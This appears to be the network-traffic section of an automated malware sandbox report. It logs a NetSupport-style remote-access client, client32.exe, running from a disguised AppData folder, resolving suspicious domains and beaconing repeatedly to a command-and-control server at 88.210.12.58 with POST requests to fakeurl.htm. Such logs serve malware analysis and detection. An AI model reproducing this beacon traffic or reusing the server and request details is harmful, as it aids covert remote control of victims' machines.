Dec 10, 2024 09:01:08.523387909 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:08.542793036 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:08.623475075 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:08.645495892 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:08.723448992 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:08.742835045 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:08.824424982 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:08.842936993 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:08.927587032 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:08.944026947 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:09.028428078 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:09.047069073 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:09.141171932 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:09.147917986 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:09.260629892 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:09.351419926 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:09.451458931 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:09.471101999 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:09.552685022 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:09.570875883 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:09.652426958 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:09.672142982 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:09.753439903 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:09.771822929 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:09.855464935 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:09.873070955 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:09.954416037 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:09.974991083 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:10.057142019 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:10.077059984 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:10.155709982 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:10.176915884 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:10.256493092 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:10.275381088 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:10.357466936 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:10.375948906 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:10.457458973 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:10.476833105 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:10.558491945 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:10.576817036 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:10.659559011 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:10.677897930 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:10.759402990 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:10.779021025 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:10.863085985 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:10.878798008 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:10.963565111 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:10.982500076 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:11.063442945 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:11.082910061 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:11.167516947 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:11.182960987 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:11.264427900 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:11.287166119 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:11.367424965 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:11.383729935 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:11.465461016 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:11.486890078 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:11.566468000 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:11.585045099 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:11.685947895 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:11.705171108 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:11.804589987 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:11.824584961 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:11.905165911 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:11.923963070 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:12.008860111 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:12.024760962 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:12.107430935 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:12.128556967 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:12.207449913 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:12.226775885 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:12.308473110 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:12.326823950 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:12.408521891 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:12.428066969 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:12.509530067 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:12.529464960 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:12.610465050 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:12.629034042 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:12.711452007 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:12.730271101 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:12.812467098 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:12.830930948 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:12.912460089 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:12.931849957 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:13.012479067 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:13.032473087 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:13.112451077 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:13.132083893 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:13.217180967 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:13.231944084 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:13.315438986 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:13.336749077 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:13.417012930 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:13.435074091 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:13.515446901 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:13.536537886 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:13.615458012 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:13.644409895 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:13.716437101 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:13.735049009 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:13.819267035 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:13.835844994 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:13.917463064 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:13.938782930 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:14.021187067 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:14.036935091 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:14.117453098 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:14.140826941 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:14.218523026 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:14.237024069 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:14.318501949 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:14.338160038 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:14.419519901 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:14.438271999 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:14.520486116 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:14.539067030 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:14.620471001 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:14.643359900 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:14.720503092 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:14.740125895 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:14.821456909 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:14.840687037 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:14.922466993 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:14.940840960 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:15.023483038 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:15.042084932 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:15.123526096 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:15.142997026 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:15.224488020 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:15.243160963 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:15.327914953 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:15.344263077 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:15.424523115 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:15.447365046 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:15.524487972 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:15.544689894 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:15.625202894 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:15.643924952 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:15.724889994 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:15.744764090 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:15.824559927 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:15.844494104 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:15.926425934 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:15.944253922 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:16.027424097 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:16.046005964 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:16.126521111 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:16.147008896 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:16.227551937 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:16.245913029 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:16.328615904 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:16.347130060 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:16.429542065 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:16.448159933 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:16.529536009 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:16.548958063 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:16.630510092 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:16.649445057 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:16.730511904 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:16.750262976 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:16.831496954 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:16.850059986 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:16.931571960 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:16.951071024 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:17.031563044 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:17.050993919 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:17.135350943 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:17.151706934 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:17.231591940 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:17.255053043 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:17.333233118 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:17.351072073 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:17.433221102 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:17.452661037 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:17.533739090 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:17.552763939 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:17.634591103 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:17.653188944 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:17.735122919 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:17.754980087 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:17.836199999 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:17.854466915 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:17.939834118 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:17.955694914 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:18.041254997 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:18.059267998 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:18.139503002 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:18.160769939 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:18.258960009 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:18.541500092 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:18.641526937 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:18.661024094 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:18.742508888 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:18.761177063 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:18.844320059 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:18.861773014 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:18.945544958 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:18.963654041 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:19.045638084 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:19.064829111 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:19.149240971 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:19.165282011 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:19.262814999 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:19.269088984 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:19.364258051 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:19.382158995 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:19.463532925 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:19.483627081 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:19.565253973 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:19.582853079 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:19.665364981 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:19.684706926 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:19.763529062 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:19.784773111 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:19.865258932 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:19.882884026 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:19.964521885 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:19.984740973 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:20.065563917 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:20.083884001 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:20.165587902 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:20.185185909 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:20.268863916 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:20.284929037 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:20.369699955 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:20.388287067 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:20.470561028 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:20.489464045 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:20.571552992 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:20.589932919 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:20.691137075 CET	3785	49723	88.210.12.58	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 08:57:14.913433075 CET	61862	53	192.168.2.6	1.1.1.1
Dec 10, 2024 08:57:15.284440994 CET	53	61862	1.1.1.1	192.168.2.6
Dec 10, 2024 08:57:29.367794037 CET	65519	53	192.168.2.6	1.1.1.1
Dec 10, 2024 08:57:29.748151064 CET	53	65519	1.1.1.1	192.168.2.6
Dec 10, 2024 08:57:30.944500923 CET	59063	53	192.168.2.6	1.1.1.1
Dec 10, 2024 08:57:31.082544088 CET	53	59063	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 10, 2024 08:57:14.913433075 CET	192.168.2.6	1.1.1.1	0x64d8	Standard query (0)	cycleconf.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 08:57:29.367794037 CET	192.168.2.6	1.1.1.1	0xfaaa	Standard query (0)	ganeres1.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 08:57:30.944500923 CET	192.168.2.6	1.1.1.1	0xef17	Standard query (0)	geo.netsupportsoftware.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 10, 2024 08:57:15.284440994 CET	1.1.1.1	192.168.2.6	0x64d8	No error (0)	cycleconf.com	23.254.224.41	A (IP address)	IN (0x0001)	false
Dec 10, 2024 08:57:29.748151064 CET	1.1.1.1	192.168.2.6	0xfaaa	No error (0)	ganeres1.com	88.210.12.58	A (IP address)	IN (0x0001)	false
Dec 10, 2024 08:57:31.082544088 CET	1.1.1.1	192.168.2.6	0xef17	No error (0)	geo.netsupportsoftware.com	104.26.0.231	A (IP address)	IN (0x0001)	false
Dec 10, 2024 08:57:31.082544088 CET	1.1.1.1	192.168.2.6	0xef17	No error (0)	geo.netsupportsoftware.com	172.67.68.212	A (IP address)	IN (0x0001)	false
Dec 10, 2024 08:57:31.082544088 CET	1.1.1.1	192.168.2.6	0xef17	No error (0)	geo.netsupportsoftware.com	104.26.1.231	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cycleconf.com

88.210.12.58connection: keep-alivecmd=pollinfo=1ack=1

88.210.12.58connection: keep-alivecmd=encdes=1data=u2hr4]%y-=id3wi7?=@ff&t[6ral$c=iyg5m=i#rtr5=ifmqyz8~zw[jv{rhe<kua]&k=jwe*9w_z8a ]

geo.netsupportsoftware.com

88.210.12.58connection: keep-alivecmd=encdes=1data=l3<(t{evk9|||$(m$ccp]u#1h*l0mtsm6

88.210.12.58connection: keep-alivecmd=encdes=1data=#mhuaag

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49723	88.210.12.58	3785	4412	C:\Users\user\AppData\Local\DNScache\client32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 08:57:30.139292002 CET	216	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 88.210.12.58Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:
Dec 10, 2024 08:57:31.111624002 CET	224	IN	HTTP/1.1 200 OKServer: NetSupport Gateway/1.92 (Windows NT)Content-Type: application/x-www-form-urlencodedContent-Length: 69Connection: Keep-AliveCMD=ENCDES=1DATA=g+${ \W[R7)^\d8=M`sM6 Data Raw: Data Ascii:
Dec 10, 2024 08:57:31.114762068 CET	428	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 234Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=u2hr4]%y-=ID3Wi7?=@Ff&t[6raL$C=IYG5M=I#rtr5=IfMQYz8~Zw[jV{rhE<KuA]&k=JwE*9W_z8A ] Data Raw: Data Ascii:
Dec 10, 2024 08:57:31.505871058 CET	309	IN	HTTP/1.1 200 OKServer: NetSupport Gateway/1.92 (Windows NT)Content-Type: application/x-www-form-urlencodedContent-Length: 154Connection: Keep-AliveCMD=ENCDES=1DATA=u2hr \WhE=I=n~2I[=I_T&=n&Z=n#Lqf3m#VWi6w:Nz:<m7?=@\|-% Data Raw: Data Ascii:
Dec 10, 2024 08:57:31.506215096 CET	278	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 84Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=l3<(T{EVk9\|\|\|$(m$CCP]U#1H*L0MtsM6 Data Raw: Data Ascii:
Dec 10, 2024 08:58:20.568017960 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:30.170964956 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:31.992976904 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:32.192953110 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:32.293951035 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:32.394956112 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:32.494982958 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:32.595952988 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:32.695980072 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:32.796147108 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:32.896063089 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:32.996961117 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:33.099983931 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
